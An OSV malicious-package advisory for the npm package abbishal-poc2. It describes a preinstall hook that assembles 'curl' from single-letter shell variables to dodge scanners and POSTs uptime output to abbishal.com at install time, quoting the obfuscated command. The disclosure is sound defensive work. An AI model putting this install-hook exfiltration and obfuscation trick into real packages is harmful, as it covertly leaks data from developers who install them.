MAL-2026-17654

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc2/MAL-2026-17654.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17654
Published
2026-10-08T03:40:58Z
Modified
2026-10-08T04:00:04Z
Summary
Malicious code in abbishal-poc2 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f)

package.json declares a preinstall script sh./test.sh. test.sh assembles the string curl from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes $i$h$l -d "uptime" https://abbishal.com/sh/poc, POSTing the output of uptime (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for curl in lifecycle scripts, and the destination domain does not match the package's claimed publisher.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-021131",
            "import_time": "2026-10-08T03:50:29.957301862Z",
            "modified_time": "2026-10-08T03:40:58Z",
            "sha256": "e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f",
            "source": "amazon-inspector",
            "versions": [
                "1.2.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / abbishal-poc2

Package

Name
abbishal-poc2
View open source insights on deps.dev
Purl
pkg:npm/abbishal-poc2

Affected ranges

Affected versions

1.*
1.2.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "test.sh",
            "sha256": "5c9586f87237f19f1c97f5614dc2b525f555879403ef3228313be132e9a410c5",
            "tlsh": "840110b34564a374ede908b21a9913e6c2a9e04a867398b8a2ef810512026a0222fd20"
        }
    ],
    "package_integrity": [
        {
            "filename": "abbishal-poc2-1.2.0.tgz",
            "hashes": {
                "sha1": "f3d5c0b98813defc1c3b63ee00235d14954db5ec",
                "sha512_sri": "sha512-0L2VJZtvR4IN46fNLFpIlshfVxF7MiCBv7jQ6Iv/CHSA1iect0Yrn0pDy9tm7IQ4Dnre9/ByYnQDRjH6MH4A9A=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc2/MAL-2026-17654.json"